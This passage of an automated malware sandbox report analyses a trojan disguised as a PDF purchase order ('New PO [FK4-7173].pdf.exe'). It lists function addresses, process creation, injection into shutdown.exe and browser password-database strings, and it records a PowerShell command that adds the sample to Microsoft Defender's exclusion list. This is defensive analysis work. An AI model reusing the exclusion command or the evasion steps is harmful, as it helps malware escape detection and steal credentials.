                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FEEDB4_2_011FEEDB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0120B16B4_2_0120B16B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112F1724_2_0112F172
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117516C4_2_0117516C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114B1B04_2_0114B1B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EF0CC4_2_011EF0CC
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011470C04_2_011470C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F70E94_2_011F70E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FF0E04_2_011FF0E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F132D4_2_011F132D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112D34C4_2_0112D34C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0118739A4_2_0118739A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011452A04_2_011452A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115B2C04_2_0115B2C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E12ED4_2_011E12ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F75714_2_011F7571
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DD5B04_2_011DD5B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012095C34_2_012095C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FF43F4_2_011FF43F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011314604_2_01131460
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FF7B04_2_011FF7B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011856304_2_01185630
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F16CC4_2_011F16CC
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D59104_2_011D5910
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011499504_2_01149950
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115B9504_2_0115B950
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AD8004_2_011AD800
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011438E04_2_011438E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FFB764_2_011FFB76
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115FB804_2_0115FB80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B5BF04_2_011B5BF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117DBF94_2_0117DBF9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FFA494_2_011FFA49
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F7A464_2_011F7A46
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B3A6C4_2_011B3A6C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DDAAC4_2_011DDAAC
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01185AA04_2_01185AA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E1AA34_2_011E1AA3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EDAC64_2_011EDAC6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F1D5A4_2_011F1D5A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01143D404_2_01143D40
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F7D734_2_011F7D73
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115FDC04_2_0115FDC0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B9C324_2_011B9C32
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FFCF24_2_011FFCF2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FFF094_2_011FFF09
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01141F924_2_01141F92
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FFFB14_2_011FFFB1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01103FD24_2_01103FD2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01103FD54_2_01103FD5
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01149EB04_2_01149EB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303A3527_2_0303A352
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030403E67_2_030403E6
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F8E3F07_2_02F8E3F0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030202747_2_03020274
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030002C07_2_030002C0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0301A1187_2_0301A118
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030081587_2_03008158
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030341A27_2_030341A2
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030401AA7_2_030401AA
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030381CC7_2_030381CC
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030120007_2_03012000
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F701007_2_02F70100
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F9C6E07_2_02F9C6E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F7C7C07_2_02F7C7C0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F807707_2_02F80770
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FA47507_2_02FA4750
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030405917_2_03040591
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030244207_2_03024420
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030324467_2_03032446
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F805357_2_02F80535
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0302E4F67_2_0302E4F6
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303AB407_2_0303AB40
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F7EA807_2_02F7EA80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03036BD77_2_03036BD7
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FAE8F07_2_02FAE8F0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F668B87_2_02F668B8
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0304A9A67_2_0304A9A6
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F8A8407_2_02F8A840
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F828407_2_02F82840
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F829A07_2_02F829A0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F969627_2_02F96962
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03022F307_2_03022F30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F92E907_2_02F92E90
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F80E597_2_02F80E59
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F8CFE07_2_02F8CFE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303EE267_2_0303EE26
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F72FC87_2_02F72FC8
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FFEFA07_2_02FFEFA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303CE937_2_0303CE93
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FF4F407_2_02FF4F40
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FA0F307_2_02FA0F30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FC2F287_2_02FC2F28
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303EEDB7_2_0303EEDB
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F70CF27_2_02F70CF2
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0301CD1F7_2_0301CD1F
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F80C007_2_02F80C00
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F7ADE07_2_02F7ADE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F98DBF7_2_02F98DBF
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03020CB57_2_03020CB5
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F8AD007_2_02F8AD00
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303132D7_2_0303132D
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F9B2C07_2_02F9B2C0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F852A07_2_02F852A0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FC739A7_2_02FC739A
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F6D34C7_2_02F6D34C
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030212ED7_2_030212ED
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F870C07_2_02F870C0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0304B16B7_2_0304B16B
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F8B1B07_2_02F8B1B0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F6F1727_2_02F6F172
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB516C7_2_02FB516C
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0302F0CC7_2_0302F0CC
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303F0E07_2_0303F0E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030370E97_2_030370E9
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303F7B07_2_0303F7B0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FC56307_2_02FC5630
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030316CC7_2_030316CC
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030375717_2_03037571
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F714607_2_02F71460
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0301D5B07_2_0301D5B0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030495C37_2_030495C3
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303F43F7_2_0303F43F
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FC5AA07_2_02FC5AA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FB767_2_0303FB76
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FF3A6C7_2_02FF3A6C
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FBDBF97_2_02FBDBF9
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FF5BF07_2_02FF5BF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03037A467_2_03037A46
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FA497_2_0303FA49
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F9FB807_2_02F9FB80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03021AA37_2_03021AA3
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0301DAAC7_2_0301DAAC
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0302DAC67_2_0302DAC6
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_030159107_2_03015910
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F838E07_2_02F838E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FED8007_2_02FED800
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F899507_2_02F89950
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F9B9507_2_02F9B950
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FF097_2_0303FF09
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F89EB07_2_02F89EB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FFB17_2_0303FFB1
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F43FD57_2_02F43FD5
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F43FD27_2_02F43FD2
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F81F927_2_02F81F92
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03031D5A7_2_03031D5A
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_03037D737_2_03037D73
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FF9C327_2_02FF9C32
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F9FDC07_2_02F9FDC0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02F83D407_2_02F83D40
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_0303FCF27_2_0303FCF2
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D1E807_2_026D1E80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CCFC07_2_026CCFC0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CCDA07_2_026CCDA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CCD977_2_026CCD97
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CB0407_2_026CB040
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026CB1847_2_026CB184
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D37207_2_026D3720
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D371B7_2_026D371B
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026D54E07_2_026D54E0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026EBAD07_2_026EBAD0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDE2957_2_02DDE295
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDE3B37_2_02DDE3B3
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDE74C7_2_02DDE74C
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDCAB87_2_02DDCAB8
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDCA667_2_02DDCA66
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02DDD8187_2_02DDD818
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02F6B970 appears 280 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FB5130 appears 58 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FFF290 appears 105 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FC7E54 appears 111 times
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 02FEEA12 appears 86 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 011BF290 appears 105 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 01175130 appears 58 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 011AEA12 appears 86 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 01187E54 appears 111 times
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: String function: 0112B970 appears 280 times
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2037932132.0000000009540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000000.2004703774.00000000002DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexkXV.exe" vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2016717202.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.000000000122D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHUTDOWN.EXEj% vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHUTDOWN.EXEj% vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exeBinary or memory string: OriginalFilenamexkXV.exe" vs New PO [FK4-7173].pdf.exe
                Source: New PO [FK4-7173].pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New PO [FK4-7173].pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, ocmU7eNMB7cxPKDXQ0.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.New PO [FK4-7173].pdf.exe.3fa9470.0.raw.unpack, ocmU7eNMB7cxPKDXQ0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, ocmU7eNMB7cxPKDXQ0.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, ocmU7eNMB7cxPKDXQ0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, ocmU7eNMB7cxPKDXQ0.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, ocmU7eNMB7cxPKDXQ0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@10/7@16/12
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New PO [FK4-7173].pdf.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhvjmyzg.vsv.ps1Jump to behavior
                Source: New PO [FK4-7173].pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New PO [FK4-7173].pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: shutdown.exe, 00000007.00000002.4472317980.00000000028BA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4472317980.00000000028C4000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4472317980.00000000028E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New PO [FK4-7173].pdf.exeReversingLabs: Detection: 52%
                Source: New PO [FK4-7173].pdf.exeVirustotal: Detection: 33%
                Source: unknownProcess created: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
                Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
